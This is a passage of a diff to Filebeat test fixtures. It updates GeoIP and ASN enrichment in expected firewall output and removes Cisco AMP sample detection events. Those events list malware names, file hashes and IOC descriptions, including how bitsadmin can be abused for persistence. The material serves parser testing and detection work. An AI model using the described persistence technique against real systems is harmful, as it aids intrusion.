+        "destination.as.number": 35994,
         "destination.as.organization.name": "Akamai Technologies, Inc.",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "104.99.234.45",
         "destination.port": 443,
         "event.action": "Accept",
@@ -3660,13 +3474,6 @@
         "client.ip": "192.168.1.100",
         "client.nat.port": 43357,
         "client.port": 61446,
-        "destination.as.number": 30148,
-        "destination.as.organization.name": "Sucuri",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "192.124.249.36",
         "destination.port": 80,
         "event.action": "Accept",
@@ -3779,13 +3586,6 @@
         "client.ip": "192.168.1.100",
         "client.nat.port": 43358,
         "client.port": 48998,
-        "destination.as.number": 30148,
-        "destination.as.organization.name": "Sucuri",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "192.124.249.31",
         "destination.port": 80,
         "event.action": "Accept",
@@ -3844,13 +3644,8 @@
         "client.ip": "192.168.1.100",
         "client.nat.port": 43359,
         "client.port": 41870,
-        "destination.as.number": 16625,
+        "destination.as.number": 35994,
         "destination.as.organization.name": "Akamai Technologies, Inc.",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "104.99.234.45",
         "destination.port": 443,
         "event.action": "Accept",
@@ -4017,13 +3812,6 @@
         "client.ip": "192.168.1.100",
         "client.nat.port": 26694,
         "client.port": 62488,
-        "destination.as.number": 30148,
-        "destination.as.organization.name": "Sucuri",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "192.124.249.41",
         "destination.port": 80,
         "event.action": "Accept",
@@ -4136,13 +3924,6 @@
         "client.ip": "192.168.1.100",
         "client.nat.port": 10023,
         "client.port": 61454,
-        "destination.as.number": 30148,
-        "destination.as.organization.name": "Sucuri",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "192.124.249.36",
         "destination.port": 80,
         "event.action": "Accept",
@@ -4282,16 +4063,6 @@
         "client.ip": "192.168.1.100",
         "client.nat.port": 43360,
         "client.port": 62122,
-        "destination.as.number": 25046,
-        "destination.as.organization.name": "Check Point Software Technologies LTD",
-        "destination.geo.city_name": "Tel Aviv",
-        "destination.geo.continent_name": "Asia",
-        "destination.geo.country_iso_code": "IL",
-        "destination.geo.country_name": "Israel",
-        "destination.geo.location.lat": 32.0678,
-        "destination.geo.location.lon": 34.7647,
-        "destination.geo.region_iso_code": "IL-TA",
-        "destination.geo.region_name": "Tel Aviv",
         "destination.ip": "194.29.39.10",
         "destination.port": 443,
         "event.action": "Accept",
@@ -4458,13 +4229,8 @@
         "client.ip": "192.168.1.100",
         "client.nat.port": 26695,
         "client.port": 55424,
-        "destination.as.number": 16625,
+        "destination.as.number": 35994,
         "destination.as.organization.name": "Akamai Technologies, Inc.",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "104.81.142.43",
         "destination.port": 443,
         "event.action": "Accept",
@@ -4577,13 +4343,6 @@
         "client.ip": "192.168.1.100",
         "client.nat.port": 26696,
         "client.port": 49026,
-        "destination.as.number": 30148,
-        "destination.as.organization.name": "Sucuri",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "192.124.249.31",
         "destination.port": 80,
         "event.action": "Accept",
@@ -4696,13 +4455,6 @@
         "client.ip": "192.168.1.100",
         "client.nat.port": 26697,
         "client.port": 62514,
-        "destination.as.number": 30148,
-        "destination.as.organization.name": "Sucuri",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "192.124.249.41",
         "destination.port": 80,
         "event.action": "Accept",
@@ -4815,13 +4567,8 @@
         "client.ip": "192.168.1.100",
         "client.nat.port": 10024,
         "client.port": 41902,
-        "destination.as.number": 16625,
+        "destination.as.number": 35994,
         "destination.as.organization.name": "Akamai Technologies, Inc.",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "104.99.234.45",
         "destination.port": 443,
         "event.action": "Accept",
@@ -4934,13 +4681,6 @@
         "client.ip": "192.168.1.100",
         "client.nat.port": 43361,
         "client.port": 61490,
-        "destination.as.number": 30148,
-        "destination.as.organization.name": "Sucuri",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "192.124.249.36",
         "destination.port": 80,
         "event.action": "Accept",
@@ -5053,13 +4793,6 @@
         "client.ip": "192.168.1.100",
         "client.nat.port": 26698,
         "client.port": 49042,
-        "destination.as.number": 30148,
-        "destination.as.organization.name": "Sucuri",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "192.124.249.31",
         "destination.port": 80,
         "event.action": "Accept",
@@ -5172,13 +4905,8 @@
         "client.ip": "192.168.1.100",
         "client.nat.port": 26699,
         "client.port": 41914,
-        "destination.as.number": 16625,
+        "destination.as.number": 35994,
         "destination.as.organization.name": "Akamai Technologies, Inc.",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "104.99.234.45",
         "destination.port": 443,
         "event.action": "Accept",
@@ -5291,13 +5019,6 @@
         "client.ip": "192.168.1.100",
         "client.nat.port": 10025,
         "client.port": 62534,
-        "destination.as.number": 30148,
-        "destination.as.organization.name": "Sucuri",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "192.124.249.41",
         "destination.port": 80,
         "event.action": "Accept",
@@ -5410,13 +5131,6 @@
         "client.ip": "192.168.1.100",
         "client.nat.port": 10026,
         "client.port": 61500,
-        "destination.as.number": 30148,
-        "destination.as.organization.name": "Sucuri",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "192.124.249.36",
         "destination.port": 80,
         "event.action": "Accept",
@@ -5529,13 +5243,8 @@
         "client.ip": "192.168.1.100",
         "client.nat.port": 10027,
         "client.port": 41938,
-        "destination.as.number": 16625,
+        "destination.as.number": 35994,
         "destination.as.organization.name": "Akamai Technologies, Inc.",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "104.99.234.45",
         "destination.port": 443,
         "event.action": "Accept",
@@ -5648,13 +5357,6 @@
         "client.ip": "192.168.1.100",
         "client.nat.port": 43362,
         "client.port": 49102,
-        "destination.as.number": 30148,
-        "destination.as.organization.name": "Sucuri",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "192.124.249.31",
         "destination.port": 80,
         "event.action": "Accept",
diff --git a/x-pack/filebeat/module/checkpoint/firewall/test/checkpoint_with_time.log b/x-pack/filebeat/module/checkpoint/firewall/test/checkpoint_with_time.log
index 8c3ff5d26878..3e649fca3090 100644
--- a/x-pack/filebeat/module/checkpoint/firewall/test/checkpoint_with_time.log
+++ b/x-pack/filebeat/module/checkpoint/firewall/test/checkpoint_with_time.log
@@ -1,2 +1,2 @@
 <134>1 2020-03-30T07:20:35Z gw-da58d3 CheckPoint 7776 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e819dc3,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; time:"1594646954"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
-<134>1 2021-05-05T12:27:09Z cp-m CheckPoint 1231 - [action:"Drop"; flags:"278528"; ifdir:"inbound"; ifname:"bond1.3999"; loguid:"{0x60928f1d,0x8,0x40de101f,0xfcdbb197}"; origin:"127.0.0.1"; originsicname:"CN=CP,O=cp.com.9jjkfo"; sequencenum:"62"; time:"1620217629"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={F6212FB3-54CE-6344-9164-B224119E2B92};mgmt=cp-m;date=1620031791;policy_name=CP-Cluster]"; action_reason:"Dropped by multiportal infrastructure"; dst:"1.1.1.1"; product:"VPN & FireWall"; proto:"6"; s_port:"52780"; service:"80"; src:"1.1.1.1"]
+<134>1 2021-05-05T12:27:09Z cp-m CheckPoint 1231 - [action:"Drop"; flags:"278528"; ifdir:"inbound"; ifname:"bond1.3999"; loguid:"{0x60928f1d,0x8,0x40de101f,0xfcdbb197}"; origin:"127.0.0.1"; originsicname:"CN=CP,O=cp.com.9jjkfo"; sequencenum:"62"; time:"1620217629"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={F6212FB3-54CE-6344-9164-B224119E2B92};mgmt=cp-m;date=1620031791;policy_name=CP-Cluster]"; action_reason:"Dropped by multiportal infrastructure"; dst:"89.160.20.156"; product:"VPN & FireWall"; proto:"6"; s_port:"52780"; service:"80"; src:"89.160.20.156"]
diff --git a/x-pack/filebeat/module/checkpoint/firewall/test/checkpoint_with_time.log-expected.json b/x-pack/filebeat/module/checkpoint/firewall/test/checkpoint_with_time.log-expected.json
index 5298751435ef..13bdc2ed7e75 100644
--- a/x-pack/filebeat/module/checkpoint/firewall/test/checkpoint_with_time.log-expected.json
+++ b/x-pack/filebeat/module/checkpoint/firewall/test/checkpoint_with_time.log-expected.json
@@ -56,16 +56,19 @@
     {
         "@timestamp": "2021-05-05T12:27:09.000Z",
         "checkpoint.action_reason_msg": "Dropped by multiportal infrastructure",
-        "client.ip": "1.1.1.1",
+        "client.ip": "89.160.20.156",
         "client.port": 52780,
-        "destination.as.number": 13335,
-        "destination.as.organization.name": "Cloudflare, Inc.",
-        "destination.geo.continent_name": "Oceania",
-        "destination.geo.country_iso_code": "AU",
-        "destination.geo.country_name": "Australia",
-        "destination.geo.location.lat": -33.494,
-        "destination.geo.location.lon": 143.2104,
-        "destination.ip": "1.1.1.1",
+        "destination.as.number": 29518,
+        "destination.as.organization.name": "Bredband2 AB",
+        "destination.geo.city_name": "Link\u00f6ping",
+        "destination.geo.continent_name": "Europe",
+        "destination.geo.country_iso_code": "SE",
+        "destination.geo.country_name": "Sweden",
+        "destination.geo.location.lat": 58.4167,
+        "destination.geo.location.lon": 15.6167,
+        "destination.geo.region_iso_code": "SE-E",
+        "destination.geo.region_name": "\u00d6sterg\u00f6tland County",
+        "destination.ip": "89.160.20.156",
         "destination.port": 80,
         "event.action": "Drop",
         "event.category": [
@@ -88,20 +91,23 @@
         "observer.type": "firewall",
         "observer.vendor": "Checkpoint",
         "related.ip": [
-            "1.1.1.1",
-            "1.1.1.1"
+            "89.160.20.156",
+            "89.160.20.156"
         ],
-        "server.ip": "1.1.1.1",
+        "server.ip": "89.160.20.156",
         "server.port": 80,
         "service.type": "checkpoint",
-        "source.as.number": 13335,
-        "source.as.organization.name": "Cloudflare, Inc.",
-        "source.geo.continent_name": "Oceania",
-        "source.geo.country_iso_code": "AU",
-        "source.geo.country_name": "Australia",
-        "source.geo.location.lat": -33.494,
-        "source.geo.location.lon": 143.2104,
-        "source.ip": "1.1.1.1",
+        "source.as.number": 29518,
+        "source.as.organization.name": "Bredband2 AB",
+        "source.geo.city_name": "Link\u00f6ping",
+        "source.geo.continent_name": "Europe",
+        "source.geo.country_iso_code": "SE",
+        "source.geo.country_name": "Sweden",
+        "source.geo.location.lat": 58.4167,
+        "source.geo.location.lon": 15.6167,
+        "source.geo.region_iso_code": "SE-E",
+        "source.geo.region_name": "\u00d6sterg\u00f6tland County",
+        "source.ip": "89.160.20.156",
         "source.port": 52780,
         "tags": [
             "checkpoint-firewall",
diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp1.ndjson.log b/x-pack/filebeat/module/cisco/amp/test/cisco_amp1.ndjson.log
index 211de5d2bc95..c21dc6c5a271 100644
--- a/x-pack/filebeat/module/cisco/amp/test/cisco_amp1.ndjson.log
+++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp1.ndjson.log
@@ -1,49 +1,49 @@
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411425813945647000,"timestamp":1610620426,"timestamp_nanoseconds":742000000,"date":"2021-01-14T10:33:46+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.12081E6CA3-95.SBX.TG","detection_id":"6411425813945647105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837","sha1":"128aa78059540cf0cdae2a3cea30cd80e00f2046","md5":"c877b67a5733c59d0d8ed8d519df0c91"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533243623469744000,"timestamp":1610619329,"timestamp_nanoseconds":596000000,"date":"2021-01-14T10:15:29+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241347137077000,"timestamp":1610618799,"timestamp_nanoseconds":657000000,"date":"2021-01-14T10:06:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Overdrive.RET","detection_id":"6533241347137077251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"BIT657.tmp","file_path":"\\\\?\\C:\\BIT657.tmp","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850","sha1":"cf162622e29bca072d01b274fbbc3ceaacdd13c7","md5":"0fe5be3811a98ee6a9c997d3812d911a"},"parent":{"process_id":896,"disposition":"Clean","file_name":"svchost.exe","identity":{"sha256":"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2","sha1":"4af001b3c3816b860660cf2de2c0fd3c1dfb4878","md5":"54a47f6b5e09a77e61649109c6a08866"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241347137077000,"timestamp":1610618799,"timestamp_nanoseconds":657000000,"date":"2021-01-14T10:06:39+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6533241347137077251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241145273614000,"timestamp":1610618752,"timestamp_nanoseconds":525000000,"date":"2021-01-14T10:05:52+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6533241145273614337","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241145273614000,"timestamp":1610618752,"timestamp_nanoseconds":619000000,"date":"2021-01-14T10:05:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Overdrive.RET","detection_id":"6533241145273614338","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"SqGGuYXyy.exe","file_path":"\\\\?\\C:\\SqGGuYXyy.exe","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850","sha1":"cf162622e29bca072d01b274fbbc3ceaacdd13c7","md5":"0fe5be3811a98ee6a9c997d3812d911a"},"parent":{"process_id":896,"disposition":"Clean","file_name":"svchost.exe","identity":{"sha256":"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2","sha1":"4af001b3c3816b860660cf2de2c0fd3c1dfb4878","md5":"54a47f6b5e09a77e61649109c6a08866"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241145273614000,"timestamp":1610618752,"timestamp_nanoseconds":525000000,"date":"2021-01-14T10:05:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Overdrive.RET","detection_id":"6533241145273614337","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"BIT4BBF.tmp","file_path":"\\\\?\\C:\\BIT4BBF.tmp","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"},"parent":{"process_id":896,"disposition":"Clean","file_name":"svchost.exe","identity":{"sha256":"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2","sha1":"4af001b3c3816b860660cf2de2c0fd3c1dfb4878","md5":"54a47f6b5e09a77e61649109c6a08866"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241145273614000,"timestamp":1610618752,"timestamp_nanoseconds":619000000,"date":"2021-01-14T10:05:52+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6533241145273614338","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1521138739875754000,"timestamp":1610618750,"timestamp_nanoseconds":875739000,"date":"2021-01-14T10:05:50+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618750,"start_date":"2021-01-14T10:05:50+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"The Windows Scripting Host (WScript.exe) was used to execute a file with a fake benign extension prior to a scripting extension. This is indicative of an attempt to conceal the malicious intent of the file and to trick the user into opening it.","short_description":"W32.WScriptExecuteFakeExtension.ioc"},"file":{"disposition":"Clean","file_name":"WScript.exe","file_path":"/C:/Windows/System32/WScript.exe","identity":{"sha256":"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0"},"parent":{"disposition":"Clean","identity":{"sha256":"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1521138739868158500,"timestamp":1610618750,"timestamp_nanoseconds":868146000,"date":"2021-01-14T10:05:50+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618750,"start_date":"2021-01-14T10:05:50+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Bitsadmin is a command-line tool that can be used to create, download or upload jobs and monitor their progress. However, it can also be used to maintain persistence and evade checks for usual persistence mechanisms. An attacker with Administrator's rights can use the setnotifycmdline option to create a persistent job and then specify a /Resume option at a later time to execute the job. This mechanism allows the malware to survive reboots since the job is run repeatedly after a system restart. Moreover, Bitsadmin by default downloads files unless the destination server is running IIS with the required server component and /UPLOAD is specified in the command-line. While this is not by itself malicious, the command-line needs to be reviewed to ascertain the origin and intent.","short_description":"W32.Bitsadmin.ioc"},"file":{"disposition":"Clean","file_name":"bitsadmin.exe","file_path":"/C:/Windows/System32/bitsadmin.exe","identity":{"sha256":"838670c83e6d1984d0c46e39c196028d292b3a6d2df96183f2f6e408f1a16e00"},"parent":{"disposition":"Clean","identity":{"sha256":"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1521138739846959000,"timestamp":1610618750,"timestamp_nanoseconds":846943000,"date":"2021-01-14T10:05:50+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618750,"start_date":"2021-01-14T10:05:50+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Windows Script Host (wscript.exe) was used to execute a JavaScript file inside a zip archive. This attack vector is increasingly being used by ransomware. This may not be necessarily malicious but it needs further investigation to determine if the executed JavaScript is indeed 